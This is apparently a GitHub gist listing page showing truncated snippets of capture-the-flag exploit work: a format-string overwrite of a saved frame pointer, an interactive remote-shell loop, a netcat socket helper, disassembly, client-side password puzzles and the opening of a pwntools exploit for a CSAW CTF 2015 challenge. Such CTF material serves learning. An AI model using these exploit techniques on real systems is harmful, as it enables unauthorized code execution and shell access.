Mathy Vanhoef vanhoefm
vanhoefm
/ gist:5305924
Created
April 3, 2013 22:14
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Step 3 --- Exploit: trigger the payload so we get a nice shell | |
| # minus 4 because leave does "mov %ebp, %esp" and then "pop %ebp" | |
| target_ebp_value = location_payload - 4 | |
| ebp_ho_count = ((target_ebp_value >> 16) % 0x10000) | |
| ebp_lo_count = (target_ebp_value % 0x10000) | |
| EXPLOIT = dword_to_bitstring(location_ebp_printf + 2) | |
| EXPLOIT += dword_to_bitstring(location_ebp_printf) | |
| if ebp_ho_count < ebp_lo_count: |
vanhoefm
/ gist:5305930
Last active
December 15, 2015 18:39
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Step 4 --- Test whether we've got our shell and let the magic happen | |
| nc.write("echo \"GOT A SHELL\"\n") | |
| nc.read_until("GOT A SHELL\n") | |
| print "\nSUCCESS! We have a shell!\n" | |
| while True: | |
| command = raw_input("$ ") | |
| nc.write(command + "\n") | |
| # quick and dirty way to detect end of output |
vanhoefm
/ gist:5326382
Last active
December 15, 2015 21:29
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ; Dump of assembler code for function printf: | |
| push %ebp ; save old frame pointer | |
| mov %esp,%ebp | |
| push %ebx | |
| call 0xb7e8ba0f | |
| add $0x10dd5b,%ebx | |
| sub $0xc,%esp | |
| lea 0xc(%ebp),%eax | |
| mov %eax,0x8(%esp) | |
| mov 0x8(%ebp),%eax |
vanhoefm
/ gist:5326418
Created
April 6, 2013 15:10
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| call 0x80486d0 <printf@plt> | |
| movl $0x8049f3a,(%esp) | |
| call 0x8048750 <puts@plt> | |
| mov -0xc(%ebp),%eax | |
| leave ; equivalent to movl %ebp, %esp | |
| ; popl %ebp | |
| ret |
vanhoefm
/ gist:5326833
Created
April 6, 2013 17:10
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -------------- netcatlib.py ----------------------------------- | |
| import socket | |
| class Netcat: | |
| # TODO: ip and port should be optionaly, and an open() method should be added | |
| # TODO: specify a timeout argument as well? | |
| def __init__(self, ip, port): | |
| self.buff = "" | |
| self.soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| self.soc.connect((ip, port)) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function validate() { | |
| var x = document.forms["formxx"]["pwz"].value; | |
| alert(x); | |
| if (x == null || x == "") { | |
| alert("Password must be filled out"); | |
| return false; | |
| } | |
| if (!x.match(/^[A-Za-z]+$/)) { | |
| alert("Bad charset"); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function validate() { | |
| var x = document.forms["formxx"]["pwz"].value; | |
| if (!x.match(/^[A-Za-z]+$/)) | |
| return false; | |
| if (!sha1(x).match(/^ff7b948953ac/)) | |
| return false; | |
| alert("Flag: " + x); | |
| return true; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdint.h> | |
| int is_correct(uint32_t seed) { | |
| uint8_t hexkey[] = "\xA4\x3D\xF6\xF3\x74"; | |
| for (uint32_t i = 0, x = seed; i < 5; ++i) { | |
| x = (214013 * x + 2531011) & 0xFFFFFF; | |
| printf("%X\n", x); | |
| if (hexkey[i] != (x >> 16)) return 0; | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdint.h> | |
| int is_correct(uint32_t seed) { | |
| uint8_t hexkey[] = "\xA4\x3D\xF6\xF3\x74"; | |
| for (uint32_t i = 0, x = seed; i < 5; ++i) { | |
| x = (214013 * x + 2531011) & 0xFFFFFF; | |
| if (hexkey[i] != (x >> 16)) return 0; | |
| } | |
| return 1; |
vanhoefm
/ csaw-ctf-2015_exploit-500.py
Created
September 21, 2015 02:24
Solution for exploiting 500 challenge of CSAW CTF 2015
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| from pwn import * | |
| # Stack layout of vulnerable functions: | |
| # | |
| # [ buffer of some length ][canary][align1][align2][saved-ebp][return-addr][arg0-buffer][arg4-count] | |
| # | |
| payload = pack(0x08048740) # send function -> send(socket, &password, 0x100, 0) |